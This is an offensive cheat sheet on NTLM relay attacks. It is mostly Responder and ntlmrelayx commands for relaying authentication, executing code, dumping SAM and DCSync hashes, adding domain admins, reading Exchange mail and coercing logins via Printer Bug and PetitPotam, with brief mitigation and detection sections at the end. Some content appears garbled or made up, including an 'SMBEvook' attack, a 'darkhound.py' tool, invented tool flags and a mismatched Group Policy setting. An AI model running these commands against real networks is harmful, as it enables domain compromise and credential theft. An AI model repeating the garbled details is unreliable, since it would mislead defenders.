Critical Severity | T1557
🔄 NTLM Relay Attacks
🧠 Description
NTLM Relay (also called NTLM middleman attack) is a technique where an attacker intercepts NTLM authentication attempts and relays them to a target service. This allows the attacker to authenticate as the victim user without needing their password hash.
Why NTLM Relay Works:
- Challenge-Response: NTLM uses challenge-response, hash can be relayed
- No Server Verification: Standard NTLM doesn't verify target
- Auto-Auth: Many apps automatically attempt NTLM auth
- Legacy Compatibility: SMB, HTTP, LDAP all support NTLM
- Cross-Site: Can relay between different protocols
Attack Flow:
- Attacker positions between client and server
- Victim authenticates to attacker (captures Net-NTLM hash)
- Attacker relays authentication to target server
- Target server grants access based on victim's credentials
⚙️ Relay Setup
Responder Configuration:
# Edit Responder.conf [Responder Core] ; Set SMB to Off to avoid cracking SMB = Off ; Set HTTP to On HTTP = On ; Set to challenge all auth attempts Challenge = 112233445566778899 # Run Responder python3 Responder.py -I eth0 -v # Use SMBv1 only to catch more python3 Responder.py -I eth0 --lm # Or with NTLM relay mode python3 Responder.py -I eth0 -r
ntlmrelayx.py (Impacket):
# Relay to specific targets python3 ntlmrelayx.py -t 10.10.10.100 -smb2support # Relay to multiple targets python3 ntlmrelayx.py -tf targets.txt -smb2support # Relay with SOCKS proxy (multi-relay) python3 ntlmrelayx.py -tf targets.txt -smb2support - socks # Auto-execute commands on relay python3 ntlmrelayx.py -t 10.10.10.100 -smb2support -c "whoami" # Use protocol downgrade python3 ntlmrelayx.py -t target --smb2support --http-method wsman
Combined Attack (Responder + ntlmrelayx):
# Terminal 1: Run Responder (SMB off to let ntlmrelayx handle it) python3 Responder.py -I eth0 -v # Terminal 2: Run ntlmrelayx python3 ntlmrelayx.py -tf targets.txt -smb2support # Or use MultiRelay.py (all-in-one) python3 MultiRelay.py -t 10.10.10.100 -dump
🎯 Target Selection
High-Value Targets:
# Domain Controllers (SMB) # - Dump SAM/SYSTEM # - DCSync for all hashes # - Add new domain admin # File Servers (SMB) # - Access to sensitive files # - Pivot for more credentials # Exchange Servers (HTTP/EWS) # - Read emails # - Send as any user # - Calendar access # Web Applications (HTTP) # - Session hijacking # - Access to sensitive data # LDAP (domain controllers) # - ACL modification # - New user creation # - Group membership changes
Enumerate Active Sessions (SMB):
# Find machines with SMB signing disabled (vulnerable to relay) nmap --script smb-security-mode.nse -p 445 10.10.10.0/24 # Or with CrackMapExec crackmapexec smb 10.10.10.0/24 --gen-relay-list targets.txt # Check for signing requirements crackmapexec smb 10.10.10.100 --local-auth -M smb_signing
Target File:
# Create targets.txt with specific hosts 10.10.10.100 10.10.10.101 dc01.corp.com fileserver.corp.com # Or use LDAP to enumerate python3 ntlmrelayx.py -wh anonymous -wb 10.10.10.100 --enum-modifications
💣 Exploitation Techniques
1. SMB to SMB (Lateral Movement):
# Relay to SMB and execute commands python3 ntlmrelayx.py -t 10.10.10.100 -smb2support -c "whoami" # Dump hashes via SMB python3 ntlmrelayx.py -t 10.10.10.100 -smb2support -d # Use multi-relay to target all signing-disabled hosts python3 ntlmrelayx.py -tf targets.txt --smb2support --escalate-user attacker
2. HTTP to SMB (Web to Domain Admin):
# Set up fake SMB server to capture and relay python3 ntlmrelayx.py -t dc01.corp.com -smb2support -c "whoami" # When victim browses to your HTTP server, relay to DC SMB
3. LDAP(S) Relay (ACL Abuse):
# Relay to LDAP (requires signing) python3 ntlmrelayx.py -t dc01.corp.com -ldap --escalate-user attacker # Add user to Domain Admins python3 ntlmrelayx.py -t dc01.corp.com -ldap -c "python3 -c 'import sys; sys.path.append(\".\"); from impacket.examples.utils import add_user; add_user(\"attacker\", \"Pass123!\")'" # Or use ACL attack module python3 ntlmrelayx.py -t dc01.corp.com -ldap --acl-add attacker
4. SMTP/IMAP Relay:
# Relay to SMTP and send emails python3 ntlmrelayx.py -t mail.corp.com -smtp -c "send mail --to admin@corp.com --from victim@corp.com --body 'pwned'" # Or relay to IMAP python3 ntlmrelayx.py -t mail.corp.com -imap -d
5. Exchange EWS Attack:
# Access Exchange Web Services python3 ntlmrelayx.py -t exchange.corp.com -ws --delegate-method all # Read emails as relayed user python3 ntlmrelayx.py -t exchange.corp.com -ews -d # Or use darkhound for EWS enumeration python3 darkhound.py -u attacker -p password -d corp.com --ews
🔐 SMB Relay Details
SMB Signing Check:
# Check if target requires signing nmap -p445 --script smb-security-mode.nse 10.10.10.100 # If Message signing is disabled, it's vulnerable # If Message signing is enabled, relay will fail # CrackMapExec check crackmapexec smb 10.10.10.100 --local-auth # Check signing status
SMBEXEC-style Relay:
# Relay and execute via SMB python3 ntlmrelayx.py -t 10.10.10.100 -smb2support -e payload.exe # Use existing SMB client python3 ntlmrelayx.py -t 10.10.10.100 -smb2support --exec-method smbexec -c "hostname" # Or use wmiexec for stealth python3 ntlmrelayx.py -t 10.10.10.100 -smb2support --exec-method wmiexec -c "hostname"
Hash Dumping via Relay:
# Dump SAM from relay target python3 ntlmrelayx.py -t 10.10.10.100 -smb2support -d # DCSync via relay (if relayed user has replication rights) python3 ntlmrelayx.py -t dc01.corp.com -smb2support -d # Use secretsdump for comprehensive dump python3 ntlmrelayx.py -t dc01.corp.com -smb2support --enum-sessions python3 secretsdump.py -hashes :ntlmhash corp.com/attacker@dc01.corp.com
🎭 SMBEvook Attack
Authentication Coercion:
# Use Printer Bug to coerce authentication # Works on most Windows servers by default # From Linux, use printerbug.py python3 printerbug.py corp.com/'attacker':password@printserver.corp.com 10.10.10.50 # Or use MS-RPRN \\PATH\TO\msfrpc.py # This forces printserver to authenticate to attacker
SMBEvook + NTLM Relay:
# Terminal 1: Start ntlmrelayx targeting DC python3 ntlmrelayx.py -t dc01.corp.com -smb2support -c "whoami" # Terminal 2: Coerce auth via printerbug python3 printerbug.py corp.com/'attacker':password@printserver.corp.com 10.10.10.50 # Printserver will authenticate to attacker # NTLM relay will forward to DC # Gain code execution as printserver account on DC
PetitPotam Alternative:
# Use PetitPotam for auth coercion python3 petitpotam.py -u attacker -p password -d corp.com -t dc01.corp.com 10.10.10.50 # Combine with ntlmrelayx # Target will authenticate to your IP, relay to DC
🛡️ Defense Evasion
NTLMv2 Downgrade:
# If victim uses NTLMv1, convert to Net-NTLMv1 # Then crack or relay # Use Responder to downgrade python3 Responder.py -I eth0 --lm # Or use ntlmrelayx with downgrade python3 ntlmrelayx.py -t target -smb2support --http-method ntlm_downgrade # Crack Net-NTLMv1 with hashcat hashcat -m 5500 hash.txt wordlist.txt # Or use John john --format=netntlm hash.txt
SMB Cross-Protocol Relay:
# Relay from SMB to LDAP python3 ntlmrelayx.py -t dc01.corp.com -smb2support -ldap # Relay from HTTP to SMB python3 ntlmrelayx.py -t fileserver.corp.com -http --smb2support # Relay between domains (if trust exists) python3 ntlmrelayx.py -t target_domain_dc --smb2support
💥 Impact
Potential Damage:
- Domain Admin: Relay to DC and execute commands as DA
- Hash Dumping: Get all user hashes via DCSync relay
- Email Access: Read all emails via Exchange relay
- ACL Modification: Give yourself any permissions
- File Access: Access any file share without credentials
🛡️ Mitigation
✅ Primary Controls:
- Enable SMB Signing: Required on all workstations and servers
- Enable LDAP Signing: Require signing for LDAP traffic
- Disable NTLM: Use only Kerberos authentication
- Extended Protection for Authentication: Enable EPA
- Restrict NT LAN Manager: Deny NTLM at domain level
- Block outbound SMB: Prevent coerced authentication
Enable SMB Signing via Group Policy:
# Computer Configuration > Policies > Windows Settings > # Security Options > Microsoft network client: Digitally sign communications (always) # Enable for all clients Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\LanmanWorkstation\Parameters" -Name "RequireSecuritySignature" -Value 1 -Type DWord # Enable for servers Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" -Name "RequireSecuritySignature" -Value 1 -Type DWord
Disable NTLM via Network Security:
# Network security: Restrict NTLM # Computer Configuration > Policies > Windows Settings > Security Settings > # Local Policies > Security Options > Network security: Restrict NTLM # Set to "Deny for domain servers" or "Deny for all servers" gpupdate /force # Verify with nltmtest tool python3 ntlmrelayx.py --test
Block Printer Bug:
# Disable Print Spooler service (if not needed) Stop-Service Spooler Set-Service -Name Spooler -StartupType Disabled # Or via GPO Computer Configuration > Policies > Windows Settings > Security Options > Interactive logon: Machine inactivity limit # Block outbound RPC traffic New-NetFirewallRule -DisplayName "Block RPC" -Direction Outbound -RemotePort 135,445 -Action Block
🔍 Detection
Windows Event ID Monitoring:
# Event ID 4624 - Account Logon (Type 3 = Network)
# Event ID 4624 - Logon with NTLM (AuthenticationPackageName: NTLM)
# Look for mismatched source IPs or unusual times
# Detect SMB relay (Event ID 4624 with same source and target)
Get-WinEvent -FilterHashtable @{LogName='Security';ID=4624} |
Where-Object { $_.Message -match 'NTLM' -and (source IP unusual) }
Network-Based Detection:
# Monitor for: # - SMB connections from same source to multiple targets # - Unusual authentication patterns # - High volume of authentication failures # - Connections from workstations to other workstations (not servers) # Zeek/Suricata detection # Look for SMB2 signing negotiation followed by relaying pattern
Sysmon Configuration:
# Alert on suspicious network connections# Alert on responder/multi-relay tools 445,88,389,636 attacker responder ntlmrelayx multi-relay
🛠️ Tools
- Responder: LLMNR/NBT-NS/mDNS poisoner
- ntlmrelayx (Impacket): NTLM relay with multiple targets
- MultiRelay.py: All-in-one SMB relay tool
- printerbug.py: Printer authentication coercion
- PetitPotam: MS-EFSR authentication coercion
- nmap (smb-security-mode): Check SMB signing status